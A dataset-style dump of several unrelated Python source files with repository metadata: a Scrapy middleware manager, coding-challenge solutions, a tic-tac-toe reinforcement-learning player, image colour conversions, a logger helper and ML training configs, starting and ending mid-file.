yfit[j]=(func(logfitxmen[j],*parmfit))
plt.plot(xfit,yfit,'r-')
plt.plot(logfitxmen,logfitymen,'ro',label=r'$\gamma-$')
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel("log M2")
plt.legend()
#Grafico 3:
plt.figure(2)
#gammamenos
xfit=np.zeros(len(logfitxmen))
yfit=np.zeros(len(logfitxmen))
parmfit=[]
for j in range(0,len(logfitxmen)):
parmfit=[matchmenos[0],matchmenos[1]]
xfit[j]=logfitxmen[j]
yfit[j]=(func(logfitxmen[j],*parmfit))
plt.plot(xfit,yfit,'r-')
plt.plot(logfitxmen,logfitymen,'ro',label=r'$\gamma-$')
plt.xlabel(r'$log |p-p_{c}|$',size=15)
plt.ylabel(r'$log M2$',size=15)
plt.legend()
#gammamas
xfit=np.zeros(len(logfitxmas))
yfit=np.zeros(len(logfitxmas))
parmfit=[]
for j in range(0,len(logfitxmas)):
parmfit=[matchmas[0],matchmas[1]]
xfit[j]=logfitxmas[j]
yfit[j]=(func(logfitxmas[j],*parmfit))
plt.plot(xfit,yfit,'b-')
plt.plot(logfitxmas,logfitymas,'bo',label=r'$\gamma+$')
plt.ylim(-5,12)
plt.xlim(-5,0)
plt.legend()
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel(r'$log\ M_{2}$')
plt.text(-2.8,10.5, "$L=128$", fontsize=25, bbox=dict(facecolor='w', alpha=0.5))
plt.text(-2.5,4.5, "$\gamma_{-}=-2.643$", fontsize=15, bbox=dict(facecolor='r', alpha=0.5))
plt.text(-4.4,2, "$\gamma_{+}=-2.644$", fontsize=15, bbox=dict(facecolor='b', alpha=0.5))
plt.legend()
plt.show()
'''
| [
"lucaslongo52@gmail.com"
] | lucaslongo52@gmail.com |
c24849a1b8b3642186311b61a2fa807278dc9787 | 0fac5c9888fd8efc01b06357a5c069cd65750c7f | /qiushaoyi/programs/scrapy-master/scrapy/middleware.py | be36f977e41187012d0885d228dcc6ec46600443 | [
"MIT",
"BSD-3-Clause"
] | permissive | qsyPython/Python_play_now | 291f6fe19f847b852f322da280d6d0c4e71f67d4 | 278b6d5d30082f8f93b26902c854737c4919405a | refs/heads/master | 2022-04-29T09:58:45.530870 | 2019-06-17T11:31:39 | 2019-06-17T11:31:39 | 125,870,084 | 2 | 1 | MIT | 2022-03-22T20:26:09 | 2018-03-19T14:23:31 | HTML | UTF-8 | Python | false | false | 2,920 | py | from collections import defaultdict
import logging
import pprint
from scrapy.exceptions import NotConfigured
from scrapy.utils.misc import load_object
from scrapy.utils.defer import process_parallel, process_chain, process_chain_both
logger = logging.getLogger(__name__)
class MiddlewareManager(object):
"""Base class for implementing middleware managers"""
component_name = 'foo middleware'
def __init__(self, *middlewares):
self.middlewares = middlewares
self.methods = defaultdict(list)
for mw in middlewares:
self._add_middleware(mw)
@classmethod
def _get_mwlist_from_settings(cls, settings):
raise NotImplementedError
@classmethod
def from_settings(cls, settings, crawler=None):
mwlist = cls._get_mwlist_from_settings(settings)
middlewares = []
enabled = []
for clspath in mwlist:
try:
mwcls = load_object(clspath)
if crawler and hasattr(mwcls, 'from_crawler'):
mw = mwcls.from_crawler(crawler)
elif hasattr(mwcls, 'from_settings'):
mw = mwcls.from_settings(settings)
else:
mw = mwcls()
middlewares.append(mw)
enabled.append(clspath)
except NotConfigured as e:
if e.args:
clsname = clspath.split('.')[-1]
logger.warning("Disabled %(clsname)s: %(eargs)s",
{'clsname': clsname, 'eargs': e.args[0]},
extra={'crawler': crawler})
logger.info("Enabled %(componentname)ss:\n%(enabledlist)s",
{'componentname': cls.component_name,
'enabledlist': pprint.pformat(enabled)},
extra={'crawler': crawler})
return cls(*middlewares)
@classmethod
def from_crawler(cls, crawler):
return cls.from_settings(crawler.settings, crawler)
def _add_middleware(self, mw):
if hasattr(mw, 'open_spider'):
self.methods['open_spider'].append(mw.open_spider)
if hasattr(mw, 'close_spider'):
self.methods['close_spider'].insert(0, mw.close_spider)
def _process_parallel(self, methodname, obj, *args):
return process_parallel(self.methods[methodname], obj, *args)
def _process_chain(self, methodname, obj, *args):
return process_chain(self.methods[methodname], obj, *args)
def _process_chain_both(self, cb_methodname, eb_methodname, obj, *args):
return process_chain_both(self.methods[cb_methodname], \
self.methods[eb_methodname], obj, *args)
def open_spider(self, spider):
return self._process_parallel('open_spider', spider)
def close_spider(self, spider):
return self._process_parallel('close_spider', spider)
| [
"qsy118614@163.com"
] | qsy118614@163.com |
f3729c568c035df49c22db835fab9c9363146475 | 9c3e0c3ea5fe2d8f48eeefdc3a9ec06a0672065d | /hackerrank/python_challenge/string_validator.py | c7a65df0ca211dee8b7cef73d3d646e743bd63a6 | [] | no_license | vaishwadeanurag/hackspace | 3e3e934367c57c566636d18a1f07a84f2d6a289c | 24c28ca2b17524c0aa2f4f67577bbc9b5c989c8d | refs/heads/master | 2021-08-31T17:38:26.541016 | 2017-12-22T08:19:52 | 2017-12-22T08:19:52 | 111,996,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # https://www.hackerrank.com/challenges/string-validators/problem
import string
if __name__ == '__main__':
s = input()
alpha = False
num = False
lower = False
upper = False
for i in s:
if not lower and i in string.ascii_lowercase:
lower = True
alpha = True
if not upper and i in string.ascii_uppercase:
upper = True
alpha = True
if not num and i.isdigit():
num = True
if lower and upper and num:
break
print(alpha or num)
print(alpha)
print(num)
print(lower)
print(upper) | [
"anuragvaishwade@gmail.com"
] | anuragvaishwade@gmail.com |
e38453257b5ffe4bf78b33679e66f545f003e960 | 5cb8c3d774391f0a04a4ca84cb3f038c5046057b | /config.py | 410e46c3b466b4cf80f06bfbab7e88f684b0e59f | [
"MIT"
] | permissive | zhhiyuan/wide_attack | e0eb90d48cf157621ad698336fd787fe198843e4 | 448df3dd3aad2ca9a514960e8403bf7e8d8eed3a | refs/heads/master | 2022-07-22T14:39:29.814189 | 2020-05-20T04:19:40 | 2020-05-20T04:19:40 | 263,548,854 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,273 | py | import torch as t
class Config:
model_path = None# 预训练模型,None表示重新训练
model = 'SqueezeNet1_1'#加载的模型,模型名必须与models/__init__.py中的名字一致
epsilon = 0.3 #PGD攻击中的干扰参数
'''
ShuffleNetV2, ShuffleNetV2_x2,
ShuffleNetV2_x4, MobileNetV2,
MobileNetV2_x2,MobileNetV2_x4,
'''
lr = 0.0005 #学习率
use_gpu = True #是否使用gpu
MEAN= (0.4914, 0.4822, 0.4465)
STD=(0.2023, 0.1994, 0.2010)#均值和方差
train_epoch = 1 # 将数据集训练多少次
save_every = 1 # 每训练多少轮保存一次模型
# imagenet得出的较好的值,具体过程参考
# https://cloud.tencent.com/developer/ask/153881
test_num = 16 # 选择攻击和测试的样本数量
batch_size = 128 # 每次喂入多少数据
print_freq = 500 # 每训练多少批次就打印一次
num_workers = 8 #加载数据集的线程数
def _parese(self):
self.device = t.device('cuda') if self.use_gpu else t.device('cpu')
print('Caculate on {}'.format(self.device))
print('user config:')
for k, v in self.__class__.__dict__.items():
if not k.startswith('_'):
print(k, getattr(self, k))
| [
"31727698+zhhiyuan@users.noreply.github.com"
] | 31727698+zhhiyuan@users.noreply.github.com |
3f1602c001f4b70e038794a08ba4c725871c4198 | 040bd1995190e858299fcdd716bd986aa0664d13 | /Trees and Graphs/MaxiumumDepthOfBinaryTree.py | 04b51d71defc1958be86b73fc93dbac3a0196e5e | [] | no_license | PravinSelva5/LeetCode_Grind | 7c568d68231ff34332d756237e79ca8d19cebfec | aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a | refs/heads/master | 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | '''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
if root.left == None and root.right == None:
return 1
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
return max(left, right) + 1 | [
"pravin.selvarajah.eng@gmail.com"
] | pravin.selvarajah.eng@gmail.com |
354fffe151be632ac75a7098700de106c6375a54 | dba200fca6011e754b7dd6cb1caa392ca3136b43 | /Player.py | 9bd879a0dd70311f27a24bee91f12efede91644a | [] | no_license | XueweiYan/Tic_Tac_Toe_Modified | 9b5cceea3a3e9dce599c9c39d37e3b84337f43b0 | d220f98c82b9800ca7fdf88a90d8203e8671b8bd | refs/heads/master | 2022-12-17T08:47:07.204357 | 2020-09-26T05:04:40 | 2020-09-26T05:04:40 | 297,521,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,361 | py | import os
import numpy as np
import pandas as pd
from random import random
from sympy.utilities.iterables import multiset_permutations as perm
class Player:
def __init__(self, database=None):
self._valid_lines = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6],
[1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]
self._alpha = 0.5 # Learn rate
self._delta_epsilon = 0.00000001
self._min_epsilon = 0.01
self._consider_win = 0.9999 # Meaning the state almost guarantees a winning, no need to explore
if database is None:
self._epsilon = 0.5 # Explore rate
self.df_6 = self.initializedf_6()
self.df_5 = self.initializedf_5()
self.df_4 = self.initializedf_4()
self.df_3 = self.initializedf_3()
self.df_2 = self.initializedf_2()
self.df_1 = self.initializedf_1()
self.df_0 = self.initializedf_0()
else:
self._epsilon = 0.0
self.df_6 = pd.read_csv(database + "/df_6.csv").rename(columns={str(x): x for x in range(9)})
self.df_6["successor_X"] = self.df_6["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_6["successor_O"] = self.df_6["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_5 = pd.read_csv(database + "/df_5.csv").rename(columns={str(x): x for x in range(9)})
self.df_5["successor_O"] = self.df_5["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_4 = pd.read_csv(database + "/df_4.csv").rename(columns={str(x): x for x in range(9)})
self.df_4["successor_X"] = self.df_4["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_3 = pd.read_csv(database + "/df_3.csv").rename(columns={str(x): x for x in range(9)})
self.df_3["successor_O"] = self.df_3["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_2 = pd.read_csv(database + "/df_2.csv").rename(columns={str(x): x for x in range(9)})
self.df_2["successor_X"] = self.df_2["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_1 = pd.read_csv(database + "/df_1.csv").rename(columns={str(x): x for x in range(9)})
self.df_1["successor_O"] = self.df_1["successor_O"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
self.df_0 = pd.read_csv(database + "/df_0.csv").rename(columns={str(x): x for x in range(9)})
self.df_0["successor_X"] = self.df_0["successor_X"].apply(lambda x: [int(y) for y in x[1:-1].split(",")])
def initialize_reward(self, row):
X_win = row.index[row == 'X'].tolist() in self._valid_lines
O_win = row.index[row == 'O'].tolist() in self._valid_lines
if X_win and O_win:
return 101 # A customized error code to mark impossible situations
return 1 * X_win + (-1) * O_win # 1 for player X winning, -1 for player O, 0 for none.
def initializedf_6(self):
def find_successor_X(row):
O_same = (
df_6.loc[(df_6[row.index[row == 'O']] == 'O').all(axis=1)]
.drop(columns=["reward_X"])
)
diff_count = (O_same != (row.drop(["reward_X"]))).sum(axis=1)
return diff_count.index[diff_count == 2].tolist()
def find_successor_O(row):
X_same = (
df_6.loc[(df_6[row.index[row == 'X']] == 'X').all(axis=1)]
.drop(columns=["reward_X", "successor_X"])
)
diff_count = (X_same != row.drop(["reward_X", "successor_X"])).sum(axis=1)
return diff_count.index[diff_count == 2].tolist()
six_marks = np.array([' ', ' ', ' ', 'X', 'X', 'X', 'O', 'O', 'O'])
df_6 = pd.DataFrame(list(perm(six_marks)))
df_6["reward_X"] = df_6.apply(self.initialize_reward, axis=1)
df_6 = df_6.loc[df_6["reward_X"] != 101].reset_index(
drop=True) # Remove all impossible cases identified in function initialize_ward
df_6["successor_X"] = df_6.apply(find_successor_X, axis=1)
df_6["successor_O"] = df_6.apply(find_successor_O, axis=1)
df_6["game_over"] = df_6["reward_X"] != 0
return df_6
def initializedf_5(self):
def find_successor_O(row):
df_6_states = self.df_6.drop(columns=["reward_X", "successor_X", "successor_O", "game_over"])
diff_count = (df_6_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
five_marks = np.array([' ', ' ', ' ', ' ', 'X', 'X', 'X', 'O', 'O'])
df_5 = pd.DataFrame(list(perm(five_marks)))
df_5["reward_X"] = df_5.apply(self.initialize_reward, axis=1)
# Remove all impossible cases identified in function initialize_ward
df_5 = df_5.loc[df_5["reward_X"] != 101].reset_index(drop=True)
df_5["successor_O"] = df_5.apply(find_successor_O, axis=1)
df_5["game_over"] = df_5["reward_X"] != 0
return df_5
def initializedf_4(self):
def find_successor_X(row):
df_5_states = self.df_5.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_5_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
four_marks = np.array([' ', ' ', ' ', ' ', ' ', 'X', 'X', 'O', 'O'])
df_4 = pd.DataFrame(list(perm(four_marks)))
df_4["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_4["successor_X"] = df_4.apply(find_successor_X, axis=1)
df_4["game_over"] = False # Impossible to have a game over state with first four hands
return df_4
def initializedf_3(self):
def find_successor_O(row):
df_4_states = self.df_4.drop(columns=["reward_X", "successor_X", "game_over"])
diff_count = (df_4_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
three_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', 'X', 'X', 'O'])
df_3 = pd.DataFrame(list(perm(three_marks)))
df_3["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_3["successor_O"] = df_3.apply(find_successor_O, axis=1)
df_3["game_over"] = False # Impossible to have a game over state with first three hands
return df_3
def initializedf_2(self):
def find_successor_X(row):
df_3_states = self.df_3.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_3_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
two_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', 'X', 'O'])
df_2 = pd.DataFrame(list(perm(two_marks)))
df_2["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_2["successor_X"] = df_2.apply(find_successor_X, axis=1)
df_2["game_over"] = False # Impossible to have a game over state with first two hands
return df_2
def initializedf_1(self):
def find_successor_O(row):
df_2_states = self.df_2.drop(columns=["reward_X", "successor_X", "game_over"])
diff_count = (df_2_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
one_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', 'X'])
df_1 = pd.DataFrame(list(perm(one_marks)))
df_1["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_1["successor_O"] = df_1.apply(find_successor_O, axis=1)
df_1["game_over"] = False # Impossible to have a game over state with the first hand
return df_1
def initializedf_0(self):
def find_successor_X(row):
df_1_states = self.df_1.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_1_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
no_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '])
df_0 = pd.DataFrame(list(perm(no_marks)))
df_0["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_0["successor_X"] = df_0.apply(find_successor_X, axis=1)
df_0["game_over"] = False # Impossible to have a game over state with no marks
return df_0
"""
Below is the methods for RL learning algorithm.
"""
def start_new_game(self):
successors = self.df_0.loc[0, "successor_X"]
options = self.df_1.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_0.loc[0, "reward_X"] = (
self.df_0.loc[0, "reward_X"] +
self._alpha * (max_reward_X - self.df_0.loc[0, "reward_X"])
)
return decision[0]
def second_move(self, prev_decision):
successors = self.df_1.loc[prev_decision, "successor_O"]
options = self.df_2.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_1.loc[prev_decision, "reward_X"] = (
self.df_1.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_1.loc[prev_decision, "reward_X"])
)
return decision[0]
def third_move(self, prev_decision):
successors = self.df_2.loc[prev_decision, "successor_X"]
options = self.df_3.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_2.loc[prev_decision, "reward_X"] = (
self.df_2.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_2.loc[prev_decision, "reward_X"])
)
return decision[0]
def fourth_move(self, prev_decision):
successors = self.df_3.loc[prev_decision, "successor_O"]
options = self.df_4.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_3.loc[prev_decision, "reward_X"] = (
self.df_3.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_3.loc[prev_decision, "reward_X"])
)
return decision[0]
def fifth_move(self, prev_decision):
successors = self.df_4.loc[prev_decision, "successor_X"]
options = self.df_5.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_4.loc[prev_decision, "reward_X"] = (
self.df_4.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_4.loc[prev_decision, "reward_X"])
)
return decision[0]
def sixth_move(self, prev_decision):
successors = self.df_5.loc[prev_decision, "successor_O"]
options = self.df_6.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_5.loc[prev_decision, "reward_X"] = (
self.df_5.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_5.loc[prev_decision, "reward_X"])
)
return decision[0]
def further_move(self, prev_decision, cur_player):
if cur_player == "X":
successors = self.df_6.loc[prev_decision, "successor_X"]
options = self.df_6.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_6.loc[prev_decision, "reward_X"] = (
self.df_6.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_6.loc[prev_decision, "reward_X"])
)
return decision[0]
else:
successors = self.df_6.loc[prev_decision, "successor_O"]
options = self.df_6.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_6.loc[prev_decision, "reward_X"] = (
self.df_6.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_6.loc[prev_decision, "reward_X"])
)
return decision[0]
def is_game_over(self, df_num, row):
if df_num == 5:
return self.df_5.loc[row, "game_over"]
elif df_num == 6:
return self.df_6.loc[row, "game_over"]
else:
return False
def beautify_board(self, row):
output = row.loc[range(9)]
for box in range(9):
if output[box] == " ":
output[box] = "-" + str(box + 1) + "-"
else:
output[box] = " " + output[box] + " "
print(" —————————")
print("|", output[0], "|", output[1], "|", output[2], "|")
print(" —————————")
print("|", output[3], "|", output[4], "|", output[5], "|")
print(" —————————")
print("|", output[6], "|", output[7], "|", output[8], "|")
print(" —————————")
def display_board(self, df_num, row):
if df_num == 0:
self.beautify_board(self.df_0.loc[row])
elif df_num == 1:
self.beautify_board(self.df_1.loc[row])
elif df_num == 2:
self.beautify_board(self.df_2.loc[row])
elif df_num == 3:
self.beautify_board(self.df_3.loc[row])
elif df_num == 4:
self.beautify_board(self.df_4.loc[row])
elif df_num == 5:
self.beautify_board(self.df_5.loc[row])
else:
self.beautify_board(self.df_6.loc[row])
def save_dfs(self, database):
if not os.path.exists(database):
os.mkdir(database)
self.df_6.to_csv(database + "/df_6.csv", index=False)
self.df_5.to_csv(database + "/df_5.csv", index=False)
self.df_4.to_csv(database + "/df_4.csv", index=False)
self.df_3.to_csv(database + "/df_3.csv", index=False)
self.df_2.to_csv(database + "/df_2.csv", index=False)
self.df_1.to_csv(database + "/df_1.csv", index=False)
self.df_0.to_csv(database + "/df_0.csv", index=False)
def set_epsilon(self, epsilon):
self._epsilon = epsilon
def set_alpha(self, alpha):
self._alpha = alpha | [
"x1yan@ucsd.edu"
] | x1yan@ucsd.edu |
e4556c6f2d87cb3083924103d43c50bea57347a9 | ac2b5bfae8b755a85af1f969c575270c7f2a93ef | /EE-Book_tx/src/lib/wechat_parser/base.py | e21b61467d5598fb1a0b49d2a39865ff62ef94a4 | [
"MIT"
] | permissive | Crazyfit/taoguba_xueqiu_book | cae83a2ebcafb34b74d966f98078328066d8840b | 2603b992242a81981ef405cc4af20c63ce1d0b43 | refs/heads/master | 2022-02-11T03:23:08.449365 | 2019-07-04T11:13:05 | 2019-07-04T11:13:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from src.lib.zhihu_parser.content.simple_answer import SimpleAnswer
from src.lib.zhihu_parser.content.simple_question import SimpleQuestion
from src.lib.wechat_parser.tools.parser_tools import ParserTools
class BaseParser(ParserTools):
def __init__(self, content):
self.dom = BeautifulSoup(content, 'html.parser')
| [
"macbookpro2100@qq.com"
] | macbookpro2100@qq.com |
6a5694ba9c9b4dbdd98396004240fcd5e7c8d65a | 45e7043b4285681782836461adf01673d018899a | /logger.py | 600c7be7acef5e95cf8089d973daac90b27df8f0 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | lanacioncom/books16 | 529ff825406bb6df16c1ef1889b1974313c0440f | a1f7b4759f267e1703b375b3a9e46fda398018f9 | refs/heads/master | 2020-05-23T10:22:49.746721 | 2019-04-25T18:05:47 | 2019-04-25T18:05:47 | 80,429,013 | 0 | 0 | MIT | 2019-01-07T20:57:40 | 2017-01-30T14:34:14 | JavaScript | UTF-8 | Python | false | false | 921 | py | import os
import app_config
import logging
from logging.handlers import RotatingFileHandler
LOG_FORMAT = '%(levelname)s:%(name)s:%(funcName)s(L%(lineno)d):%(asctime)s: %(message)s'
def get_logger(name=__name__, log_file_name=app_config.LOG_FILE_NAME):
folder_logs = 'logs'
file_path = os.path.join(folder_logs, log_file_name)
if not os.path.exists(folder_logs):
os.makedirs(folder_logs)
# logger = logging.getLogger(__name__)
logger = logging.getLogger(name)
logger.setLevel(app_config.LOG_LEVEL)
# create a file handler
handler = RotatingFileHandler(file_path, mode='a', maxBytes=2*1024*1024, backupCount=2, encoding=None, delay=0)
handler.setLevel(app_config.LOG_LEVEL)
# create a logging format
formatter = logging.Formatter(LOG_FORMAT)
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
return logger
| [
"cristianbertelegni@gmail.com"
] | cristianbertelegni@gmail.com |
dba8ea53204e8b7fbcb0c3a367a17b3598e058e5 | 212202cdb2e034ff066fdafc7bd5eba1c44046e0 | /tools/convert.py | 9e46e3a7510fe1cc2f95e90e165e766d6b0eb5a8 | [] | no_license | vikiQiu/Distort-and-recover-tensorflow-py3 | 01d5cd67ac34de7584f2821e497d17ad6b7ee4e1 | 7b559fadf885aa8e26bac0714e157112ba3f6e4c | refs/heads/master | 2020-03-28T05:11:02.216045 | 2018-09-28T07:41:03 | 2018-09-28T07:41:03 | 147,761,036 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | import numpy as np
from scipy.misc import imread
import os,glob
def rgb2cmyk(rgb):
max_rgb = np.clip(np.amax(rgb,axis=2), 0.000001,1)
K = 1 - max_rgb
C = np.divide((max_rgb-rgb[:,:,0]), max_rgb)
M = np.divide((max_rgb-rgb[:,:,1]), max_rgb)
Y = np.divide((max_rgb-rgb[:,:,2]), max_rgb)
CMYK = np.stack([C,M,Y,K], axis=-1)
return CMYK
def cmyk2rgb(cmyk):
R = np.multiply((1 - cmyk[:,:,0]), (1 - cmyk[:,:,-1]))
G = np.multiply((1 - cmyk[:,:,1]), (1 - cmyk[:,:,-1]))
B = np.multiply((1 - cmyk[:,:,2]), (1 - cmyk[:,:,-1]))
RGB = np.stack([R,G,B], axis=-1)
return RGB
| [
"vikiqiu@hotmail.com"
] | vikiqiu@hotmail.com |
afec691f540c742d23f04dddec8bf6a673ca7277 | 0c890e921cebb24aa4ffe68d15f5bdb7d937931d | /lesson03/task_03_05.py | cb58a469bb52cb51ca7a410ba85558bfb711ef72 | [] | no_license | ishmatov/GeekBrains-PythonBasics | c8cb81fbacbbed7a1668728c9049160dad305c7d | 367ece0f99bfe9bce84961bee7e2cf7826285af7 | refs/heads/master | 2022-11-16T15:50:09.824945 | 2020-06-02T06:01:18 | 2020-06-02T06:01:18 | 267,243,344 | 0 | 0 | null | 2020-06-05T10:51:44 | 2020-05-27T06:51:51 | Python | UTF-8 | Python | false | false | 1,502 | py | """
5. Программа запрашивает у пользователя строку чисел, разделенных пробелом. При нажатии Enter должна выводиться сумма
чисел. Пользователь может продолжить ввод чисел, разделенных пробелом и снова нажать Enter. Сумма вновь введенных чисел
будет добавляться к уже подсчитанной сумме. Но если вместо числа вводится специальный символ, выполнение программы
завершается. Если специальный символ введен после нескольких чисел, то вначале нужно добавить сумму этих чисел к
полученной ранее сумме и после этого завершить программу.
"""
def sum_list(str_num):
global result
for el in str_num:
if el.isdigit():
result += int(el)
else:
if el == "#":
return False
return True
result = 0
while True:
str_num = list(input("Введите строку чисел через 'пробел', при вводе не числа программа или стоп символа '#' будет завершена: ").split())
if not sum_list(str_num):
print(result)
break
print(result)
| [
"ishmatov.rus@gmail.com"
] | ishmatov.rus@gmail.com |
cfe40a5dc8b0f534e15d8d6e43b436f9d632ba7e | 19fb5badd6180bb44f1c7a2fa2f1aef303a36c22 | /JSAC/FinalProject/sripts/ThreeCluster/ThreeSmall.py | 1bff2b6dc2e107af5b91b21869a9a05ad3d3b9f6 | [] | no_license | JessicaAndcode/STCNet | b747ed72c72a1bca300e69a56cb82956dcf58049 | c4f77fc887577cf92f0259c5ca9f2362c7cf9853 | refs/heads/master | 2022-03-23T15:07:19.914593 | 2019-12-29T11:32:46 | 2019-12-29T11:32:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,688 | py | # -*- coding: utf-8 -*-
"""
/*******************************************
** This is a file created by Chuanting Zhang
** Name: threecluster
** Date: 5/15/18
** Email: chuanting.zhang@gmail.com
** BSD license
********************************************/
"""
import os
import sys
import argparse
import numpy as np
from datetime import datetime
from sklearn import metrics
import matplotlib.pyplot as plt
import pandas as pd
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from JSAC.FinalProject.utils.dataset import read_data
from JSAC.FinalProject.utils.model import DenseNet
torch.manual_seed(22)
device = torch.device("cuda")
parse = argparse.ArgumentParser()
parse.add_argument('-height', type=int, default=100)
parse.add_argument('-width', type=int, default=100)
parse.add_argument('-traffic', type=str, default='call')
parse.add_argument('-meta', type=int, default=0)
parse.add_argument('-cross', type=int, default=1)
parse.add_argument('-close_size', type=int, default=3)
parse.add_argument('-period_size', type=int, default=0)
parse.add_argument('-trend_size', type=int, default=0)
parse.add_argument('-test_size', type=int, default=24*7)
parse.add_argument('-nb_flow', type=int, default=1)
parse.add_argument('-cluster', type=int, default=3)
parse.add_argument('-fusion', type=int, default=1)
parse.add_argument('-transfer', type=int, default=0)
parse.add_argument('-crop', dest='crop', action='store_true')
parse.add_argument('-no-crop', dest='crop', action='store_false')
parse.set_defaults(crop=True)
parse.add_argument('-train', dest='train', action='store_true')
